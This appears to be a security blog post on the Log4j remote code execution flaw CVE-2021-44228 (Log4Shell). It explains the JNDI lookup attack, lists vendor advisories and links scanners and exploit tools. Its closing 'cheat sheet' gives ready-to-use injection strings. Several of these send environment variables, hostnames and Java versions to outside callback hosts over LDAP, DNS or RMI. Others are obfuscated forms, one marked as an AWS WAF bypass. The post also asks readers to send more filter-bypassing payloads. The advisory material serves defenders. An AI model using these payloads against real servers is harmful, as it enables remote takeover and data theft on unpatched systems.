Log4j RCE 💣- Exploit - Advisory - Resource & Cheat Sheet

(CVE-2021-44228) Log4j RCE 0-day Details, Advisory & mitigation

Admin

Updated on: December 27, 2021

On December 9, 2021, A critical remote code execution vulnerability impacting at least Apache Log4j 2 (versions 2.0 to 2.14.1) was recently announced by Apache. This vulnerability is designated by Mitre as CVE-2021-44228 with the highest severity rating of 10.0. The vulnerability is also known as Log4Shell or LogJam by security researchers. If exploited, this vulnerability allows adversaries to potentially take full control of the impacted system.

Log4j 2 is a commonly used open-source third-party Java logging library used in software applications and services.

How the attack works:

After the initial insertion of the jndi: string, a URI is followed to access the secondary payload which causes command execution.

The attacker would construct an initial jndi: insertion and include it in the User-Agent HTTP Header:

User-Agent: ${jndi:ldap://<host>:<port>/<path>}

Now the vulnerable Log4j instance will make an LDAP query to the included URI. The LDAP server will then respond with directory information containing the secondary payload link:

Security Advisories / Bulletins [ Total:218 ]

0-9

1password

Akamai
Apache - Apache Druid | Apache Flink | Apache LOG4J | Apache Kafka | Apache Solr | Apache Guacamole
Apero CAS
Apigee
App Dynamics
Appsheet
Aptible
Arista
Atlassian
Automox
Avantra Syslink
Avaya
AWS 1 | AWS 2
AZURE Datalake store java

Ubiquiti - UniFi UI
USSignal MSP

Yandex

Big Thanks to @SwitHak for all the Advisory Maintenance. Apart from We kindly request to everyone, (Individual, team, Organisation, or Firm) comment down the link of Advisry or Resource (Tools/Scripts) that needs to be added.

Apache Log4j RCE vulnerability is much bigger than what we think because Log4j is been used everywhere. In 2015, Java says that Java has over 10 million developers and running on 56 billion devices globally.

Here is the brief details on the Log4Shell Vulnerability in Apache Log4j utility.

CVE	severity	CVSS Score	Kind	Fixed verion	Reporter
CVE-2021-44228	Critical	10.0	RCE	2.15.0	ChenZhaojun of Alibaba Cloud Security Team
CVE-2021-45046	Critical	9.0	RCE	2.16.0	iCConsult Kai Mindermann
CVE-2021-45105	High	7.5	DoS	2.17.0	Hideki Okamoto of Akamai Technologies

Resources for Log4j Remote Code Execution Vulnerability Testing/Exploit

Log4j-detect - Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URLs with multithreading.
log4shell-detector - Python-based scanner/detector for Log4Shell exploitation attempts.
Logout4Shell - One of the best tools to date. It is a “vaccine” for the Apache Log4Shell vulnerability (CVE-2021-44228). Logout4Shell exploits the vulnerability and the payload therein forces the logger to reconfigure itself with the vulnerable setting disabled - this effectively blocks any further attempt to exploit Log4Shell on this serverKudos to Cybereason
Log4j2Scan - a Burp Suite Extension written in JAVA which could be useful as scan log4j2rce.
BurpLog4j2Scan - Another BurpSuite passive scanning plug-ins for Log4j2 RCE.
BurpShiroPassiveScan - BurpShiroPassiveScan is a scanning plug-in that hopefully saves some penetration time for watering.
Log4j2Scan - Log4j2 remote code executes vulnerabilities, BurpSuite passive scanning plug-ins.
Log4Shell RCE Exploit - fully independent exploit does not require any 3rd party binaries. The exploit spraying the payload to all possible logged HTTP Headers such as X-Forwarding , Server-IP , User-Agent
Log4j2Scan - Log4j2 remote code executes vulnerabilities, BurpSuite passive scanning plug-ins.
log4j-scan - A fully automated, accurate, and extensive scanner for finding vulnerable log4j hosts.
Pachine - Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation).

We are adding more...!!! Please Comment down if you have any.

Log4j RCE Cheat Sheet

 
${jndi:ldap://${env:user}.uedo81.dnslog.cn/exp}

${jndi:dns://${hostName}.uedo81.dnslog.cn/a}

${jndi:dns://${env:COMPUTERNAME}.uedo81.dnslog.cn/a}

${jndi:dns://${env:USERDOMAIN}.qnfw43.dnslog.cn/a}

${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://dslepf.dnslog.cn/tem}

${${lower:jndi}:${lower:rmi}://dslepf.dnslog.cn/tem}

${jndi:ldap://dslepf.dnslog.cn/exp}

${jndi:dns://aeutbj.example.com/ext}

${jndi:${lower:l}${lower:d}a${lower:p}://example.com/

${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1:1389/ass}

${${::-j}ndi:rmi://127.0.0.1:1389/ass}

${jndi:rmi://a.b.c}

${${lower:jndi}:${lower:rmi}://q.w.e/poc}

${${lower:${lower:jndi}}:${lower:rmi}://a.s.d/poc}

${jndi:ldap://${env:JAVA_VERSION}.domain/a}

${jndi:ldap://${sys:java.version}.domain/a}

${jndi:ldap://${hostName}.domain/a}

${jndi:ldap://${sys:java.vendor}.domain/a}

${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a}

${j${k8s:k5:-ND}i${sd:k5:-:}ldap://mydogsbutt.com:1389/o} (AWS WAF bypass)

We are adding more...!!! Please Comment down if you have any.

Once again, we request to everyone, (Individual, team, Organisation, or Firm) comment down the link of Advisory, Resource (Tools/Scripts), that needs to be added or Cheat Sheet that bypass WAF filters. Image: fastly.com